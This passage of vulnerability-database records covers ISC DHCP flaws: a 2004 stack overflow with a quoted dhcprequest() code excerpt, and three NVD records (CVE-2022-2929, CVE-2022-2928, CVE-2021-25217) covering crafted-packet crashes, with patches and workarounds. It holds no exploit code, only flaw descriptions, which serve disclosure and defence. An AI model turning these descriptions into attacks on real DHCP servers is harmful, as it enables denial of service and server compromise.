reassembled hostname option passed to \nthe daemon, afterwhat it is used as is in sprintf and stored in msgbuf \n(fixed size) without any length checking. \nlocal msgbuf can obviously be overrun, corrupting various structures in \nstack and eventually causing the server to crash\nNote that the call to db_printable( ), filtering hostname, may render \nthe task harder to root a server but likely not impossible. \nAlso being able to corrupt structures like *lease or *oc may have \ninteresting side effects from an attacker perspective. \n\nvoid dhcprequest (packet, ms_nulltp, ip_lease)\n struct packet *packet;\n int ms_nulltp;\n struct lease *ip_lease;\n{\n struct lease *lease;\n struct iaddr cip;\n struct iaddr sip;\n struct subnet *subnet;\n int ours = 0;\n struct option_cache *oc;\n struct data_string data;\n int status;\n char msgbuf [1024]; /* XXX */\n char *s;\n char smbuf [19];\n\n.... \n\nthe very same problem is present in dhcpdiscover( ), dhcpdecline( ), \ndhcprequest( ) , dhcprelease( ), ... \nplease look at the diff in unified format, attached to this email, for a \ndetailed list",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
}
],
"trust": 3.69
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#654390",
"trust": 3.5
},
{
"db": "USCERT",
"id": "TA04-174A",
"trust": 2.9
},
{
"db": "NVD",
"id": "CVE-2004-0461",
"trust": 2.8
},
{
"db": "BID",
"id": "10591",
"trust": 2.8
},
{
"db": "CERT/CC",
"id": "VU#317350",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "23265",
"trust": 1.8
},
{
"db": "XF",
"id": "16476",
"trust": 1.4
},
{
"db": "XF",
"id": "16475",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117",
"trust": 0.7
},
{
"db": "SUSE",
"id": "SUSE-SA:2004:019",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040708 [OPENPKG-SA-2004.031] OPENPKG SECURITY ADVISORY (DHCPD)",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040622 DHCP VULN // NO CODE 0DAY //",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040628 ISC DHCP OVERFLOWS",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "TA04-174A",
"trust": 0.6
},
{
"db": "MANDRAKE",
"id": "MDKSA-2004:061",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-8891",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "52810",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "33622",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "33664",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"id": "VAR-200408-0175",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8891"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:09:54.035000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ISC Dynamic Host Configuration Protocol (DHCP)",
"trust": 0.8,
"url": "https://www.isc.org/sw/dhcp/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-174a.html"
},
{
"trust": 2.7,
"url": "http://www.kb.cert.org/vuls/id/654390"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/10591"
},
{
"trust": 1.8,
"url": "http://www.xerox.com/downloads/usa/en/c/cert_xrx06_004_v11.pdf"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:061"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/23265"
},
{
"trust": 1.7,
"url": "http://www.novell.com/linux/security/advisories/2004_19_dhcp_server.html"
},
{
"trust": 1.6,
"url": "about vulnerability notes"
},
{
"trust": 1.6,
"url": "contact us about this vulnerability"
},
{
"trust": 1.6,
"url": "provide a vendor statement"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/16476"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16476"
},
{
"trust": 1.0,
"url": "http://www.kb.cert.org/vuls/id/317350"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108795911203342\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108843959502356\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=108938625206063\u0026w=2"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0461"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/16475"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta04-174a/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta04-174a"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2004-0461"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108843959502356\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108938625206063\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108795911203342\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.mandrakesoft.com/security/advisories?name=mdksa-2004:061"
},
{
"trust": 0.3,
"url": "/archive/1/367286"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108795911203342\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108843959502356\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108938625206063\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://www.xerox.com/downloads/usa/en/c/cert_xrx06_006_v1b.pdf"
},
{
"trust": 0.1,
"url": "http://secunia.com/software_inspector/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/23265/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4746/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4553/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-174a.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.isc.org/sw/dhcp/"
},
{
"trust": 0.1,
"url": "http://www.isc.org/products/dhcp"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "PACKETSTORM",
"id": "52810"
},
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "PACKETSTORM",
"id": "33664"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-06-22T00:00:00",
"db": "CERT/CC",
"id": "VU#317350"
},
{
"date": "2004-06-22T00:00:00",
"db": "CERT/CC",
"id": "VU#654390"
},
{
"date": "2004-08-06T00:00:00",
"db": "VULHUB",
"id": "VHN-8891"
},
{
"date": "2004-06-22T00:00:00",
"db": "BID",
"id": "10591"
},
{
"date": "2009-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"date": "2006-12-07T06:24:29",
"db": "PACKETSTORM",
"id": "52810"
},
{
"date": "2004-06-22T23:37:13",
"db": "PACKETSTORM",
"id": "33622"
},
{
"date": "2004-06-28T00:42:00",
"db": "PACKETSTORM",
"id": "33664"
},
{
"date": "2004-06-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"date": "2004-08-06T04:00:00",
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-07-13T00:00:00",
"db": "CERT/CC",
"id": "VU#317350"
},
{
"date": "2004-07-21T00:00:00",
"db": "CERT/CC",
"id": "VU#654390"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-8891"
},
{
"date": "2009-07-12T05:16:00",
"db": "BID",
"id": "10591"
},
{
"date": "2009-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-117"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "33622"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ISC DHCP contains a stack buffer overflow vulnerability in handling log lines containing ASCII characters only",
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "10591"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
],
"trust": 0.9
}
}
CVE-2022-2929 (GCVE-0-2022-2929)
Vulnerability from nvd – Published: 2022-10-07 04:45 – Updated: 2024-09-16 18:28
VLAI?
Title
DHCP memory leak
Summary
In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory.
Severity ?
6.5 (Medium)
CWE
- The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
Date Public ?
2022-10-05 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:52:59.819Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://kb.isc.org/docs/cve-2022-2929"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "1.0 through versions before 4.1-ESV-R16-P2"
},
{
"status": "affected",
"version": "4.2 through versions before 4.4.3.-P1"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
}
],
"datePublic": "2022-10-05T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1 a system with access to a DHCP server, sending DHCP packets crafted to include fqdn labels longer than 63 bytes, could eventually cause the server to run out of memory."
}
],
"exploits": [
{
"lang": "en",
"value": "We are not aware of any active exploits."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "The function fqdn_universe_decode() allocates buffer space for the contents of option 81 (fqdn) data received in a DHCP packet. The maximum length of a DNS label is 63 bytes. The function tests the length byte of each label contained in the fqdn; if it finds a label whose length byte value is larger than 63, it returns without dereferencing the buffer space. This will cause a memory leak. Affects In ISC DHCP 1.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"url": "https://kb.isc.org/docs/cve-2022-2929"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads. 4.4.3-P1 4.1-ESV-R16-P2"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "DHCP memory leak",
"workarounds": [
{
"lang": "en",
"value": "As exploiting this vulnerability requires an attacker to send packets for an extended period of time, restarting servers periodically could be a viable workaround."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2022-2929",
"datePublished": "2022-10-07T04:45:12.836Z",
"dateReserved": "2022-08-22T00:00:00.000Z",
"dateUpdated": "2024-09-16T18:28:37.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2928 (GCVE-0-2022-2928)
Vulnerability from nvd – Published: 2022-10-07 04:45 – Updated: 2024-09-17 00:21
VLAI?
Title
An option refcount overflow exists in dhcpd
Summary
In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option's refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort.
Severity ?
6.5 (Medium)
CWE
- A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option's refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
Date Public ?
2022-10-05 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:53:00.326Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://kb.isc.org/docs/cve-2022-2928"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "4.4.0 through versions before 4.4.3-P1"
},
{
"status": "affected",
"version": "4.1 ESV 4.1-ESV-R1 through versions before 4.1-ESV-R16-P1"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank VictorV of Cyber Kunlun Lab for discovering and reporting this issue."
}
],
"datePublic": "2022-10-05T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option\u0027s refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort."
}
],
"exploits": [
{
"lang": "en",
"value": "We are not aware of any active exploits."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "A DHCP server configured with allow leasequery;, a remote machine with access to the server can send lease queries for the same lease multiple times, leading to the add_option() function being repeatedly called. This could cause an option\u0027s refcount field to overflow and the server to abort. Internally, reference counters are integers and thus overflow at 2^31 references, so even at 1000 lease query responses per second, it would take more than three weeks to crash the server. Affects In ISC DHCP 4.4.0 -\u003e 4.4.3, ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16-P1",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"url": "https://kb.isc.org/docs/cve-2022-2928"
},
{
"name": "[debian-lts-announce] 20221010 [SECURITY] [DLA 3146-1] isc-dhcp security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00015.html"
},
{
"name": "FEDORA-2022-f5a45757df",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QQXYCIWUDILRCNBAIMVFCSGXBRKEPB4K/"
},
{
"name": "FEDORA-2022-9ca9a94e28",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T6IBFH4MRRNJQVWEKILQ6I6CXWW766FX/"
},
{
"name": "FEDORA-2022-c4f274a54f",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SARIK7KZ7MGQIWDRWZFAOSQSPXY4GOU/"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of ISC DHCP. These can all be downloaded from https://www.isc.org/downloads. 4.4.3-P1 4.1-ESV-R16-P2"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "An option refcount overflow exists in dhcpd",
"workarounds": [
{
"lang": "en",
"value": "Disable lease query on the server for DHCPv4 or restart the server periodically."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2022-2928",
"datePublished": "2022-10-07T04:45:11.751Z",
"dateReserved": "2022-08-22T00:00:00.000Z",
"dateUpdated": "2024-09-17T00:21:40.167Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-25217 (GCVE-0-2021-25217)
Vulnerability from nvd – Published: 2021-05-26 22:10 – Updated: 2024-09-16 22:08
VLAI?
Title
A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient
Summary
In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted.
Severity ?
7.4 (High)
CWE
- Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled. Because of a discrepancy between the code which handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where: dhcpd, while running in DHCPv4 or DHCPv6 mode, or dhclient, the ISC DHCP client implementation will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code. Affects ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability. Affects both dhcpd (server) and dhcpcd (client).
Assigner
References
Impacted products
Date Public ?
2021-05-26 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T19:56:11.067Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://kb.isc.org/docs/cve-2021-25217"
},
{
"name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
},
{
"name": "FEDORA-2021-08cdb4dc34",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
},
{
"name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
},
{
"name": "FEDORA-2021-8ca8263bde",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
},
{
"tags": [
"x_transferred"
],
